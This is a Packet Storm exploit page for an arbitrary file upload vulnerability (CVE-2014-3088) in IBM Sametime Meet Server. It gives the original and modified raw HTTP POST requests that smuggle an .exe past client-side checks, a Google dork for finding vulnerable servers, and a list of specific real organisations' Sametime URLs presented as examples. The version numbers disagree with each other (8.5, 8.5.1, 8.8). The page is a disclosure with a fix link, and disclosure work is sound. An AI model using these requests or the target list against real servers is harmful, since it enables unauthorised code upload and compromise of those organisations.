exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

IBM Sametime Meet Server 8.5 Arbitrary File Upload

IBM Sametime Meet Server 8.5 Arbitrary File Upload
Posted Aug 11, 2014
Authored by Adriano Marcio Monteiro

IBM Sametime Meet Server version 8.8 suffers from a remote arbitrary file upload vulnerability.

tags | exploit, remote, arbitrary, file upload
advisories | CVE-2014-3088
SHA-256 | a1948e9b3992363b375614da149aca81e22e4b77935273eb6ed883981ca609b7

IBM Sametime Meet Server 8.5 Arbitrary File Upload

Change Mirror Download
# Exploit Title:   IBM Sametime Meet Server 8.5 Arbitrary File Upload
# Google Dork: intitle:"New Meet - IBM Lotus Sametime"
# Date: 11/08/2014
# CVSS Score: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=AV:N/AC:M/Au:N/C:P/I:P/A:P
# CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-3088
# OSVDB-ID: http://osvdb.org/108681
#
# Author: Adriano Marcio Monteiro
# E-mail: adrianomarciomonteiro@gmail.com
# Blog: http://www.brazucasecurity.com.br
#
# Vendor: http://www.ibm.com
# Software: http://www.ibm.com/sametime
# Version: 8.5.1
# Advisory: https://www-304.ibm.com/support/docview.wss?uid=swg21679221
#
# Test Type: Black Box
# Tested on: Windows 7 Enterprise SP1 x86 pt-br, Mozilla Firefox 30.0 /Internet Explorer 10 / Google Chrome Versão 33.0.1750.146 m



Table of Contents

[0x00] The Vulnerability
[0x01] Exploit Description
[0x02] PoC - Proof of Concept
[0x03] Correction or Workaround
[0x04] Timeline
[0x05] Published
[0x06] References
[0x07] Bibliography



[0x00] The Vulnerability

Arbitray File Upload
Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step. The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, and simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.
There are really two classes of problems here. The first is with the file metadata, like the path and file name. These are generally provided by the transport, such as HTTP multi-part encoding. This data may trick the application into overwriting a critical file or storing the file in a bad location. You must validate the metadata extremely carefully before using it.
The other class of problem is with the file size or content. The range of problems here depends entirely on what the file is used for. See the examples below for some ideas about how files might be misused. To protect against this type of attack, you should analyze everything your application does with files and think carefully about what processing and interpreters are involved.



[0x01] Exploit Description
IBM Sametime Meeting Server allow anonymous users to send arbitrary files by modifying the Content-Type header and file extension, as demonstrated by replacing a text/plain .txt upload with an application/octet-stream .exe upload. in the post request. The file upload restrictions occurs only client side.



[0x02] PoC - Proof of Concept
For exploit this vulnerability, you can use Burp Suite or another proxy of your choice.

************************
*** Original content ***
************************

POST /stconf.nsf/wAttach?OpenForm&Seq=1&5F1BF7DE56F68DA583257D040071276C0 HTTP/1.1
Host: sametime02.myserver.com.br
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://sametime02.myserver.com.br/stconf.nsf/wAttach?OpenForm&5F1BF7DE56F68DA583257D040071276C0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16704454925606
Content-Length: 729

-----------------------------16704454925606
Content-Disposition: form-data; name="__Click"
0
-----------------------------16704454925606
Content-Disposition: form-data; name="MeetingDocID"
5F1BF7DE56F68DA583257D040071276C
-----------------------------16704454925606
Content-Disposition: form-data; name="AttachFlag"
1
-----------------------------16704454925606
Content-Disposition: form-data; name="AttachList"
Sem Anexos
-----------------------------16704454925606
Content-Disposition: form-data; name="%%File.832578a70066c5a9.116f49cec1616cad85257134007343d5.$Body.0.3206"; filename="OWNED.exe.txt"
Content-Type: text/plain
... txt content ...
-----------------------------16704454925606--

************************
*** Modified content ***
************************

POST /stconf.nsf/wAttach?OpenForm&Seq=1&5F1BF7DE56F68DA583257D040071276C0 HTTP/1.1
Host: sametime02.myserver.com.br
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://sametime02.bancobmg.com.br/stconf.nsf/wAttach?OpenForm&5F1BF7DE56F68DA583257D040071276C0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16704454925606
Content-Length: 729

-----------------------------16704454925606
Content-Disposition: form-data; name="__Click"
0
-----------------------------16704454925606
Content-Disposition: form-data; name="MeetingDocID"
5F1BF7DE56F68DA583257D040071276C
-----------------------------16704454925606
Content-Disposition: form-data; name="AttachFlag"
1
-----------------------------16704454925606
Content-Disposition: form-data; name="AttachList"
Sem Anexos
-----------------------------16704454925606
Content-Disposition: form-data; name="%%File.832578a70066c5a9.116f49cec1616cad85257134007343d5.$Body.0.3206"; filename="OWNED.exe"
Content-Type: application/octet-stream
...EXE Content...
-----------------------------16704454925606--

Examples:

http://sametime.eletrosul.gov.br/stconf.nsf/frmConference?OpenForm
http://sametime.sp.gov.br/stconf.nsf/frmConference?OpenForm
http://sametime.grude.ufmg.br/stconf.nsf/frmConference?OpenForm
http://sametime.schahin.com.br/stconf.nsf/frmConference?OpenForm
http://sametime.c-pack.com.br/stconf.nsf/frmConference?OpenForm
http://www.azi.com.br/stconf.nsf/frmConference?OpenForm
http://aquila.sealinc.org/stconf.nsf/frmConference?Openform
http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform
http://comware.net/stconf.nsf/frmConference?Openform
https://236ws.dpteruel.es/stconf.nsf/frmConference?OpenForm
https://correoweb.gruposanjose.biz/stconf.nsf/frmConference?Openform
http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform
https://mail.dba.uz/stconf.nsf/frmConference?Openform



[0x03] Correction or Workaround

Apply the procedures described in the follow link:
http://www-01.ibm.com/support/docview.wss?uid=swg21679454



[0x04] Timeline

18/07/2014 - Vulnerabilities discovered
19/07/2014 - Vulnerabilities reporteds to IBM PSIRT Team
23/07/2014 - Advisory and troubleshooting fix published



[0x05] Published

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3088
http://www.securityfocus.com/bid/68291



[0x06] References

OWASP - Unrestricted File Upload
https://www.owasp.org/index.php/Unrestricted_File_Upload

CWE-264: Permissions, Privileges, and Access Controls
http://cwe.mitre.org/data/definitions/264.html



[0x07] Bibliography

http://www-10.lotus.com/ldd/stwiki.nsf/xpDocViewer.xsp?lookupName=Administering+Sametime+Standard+8.5.2+documentation#action=openDocument&res_title=Sametime_Meeting_Server_st852&content=pdcontent



[end]
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close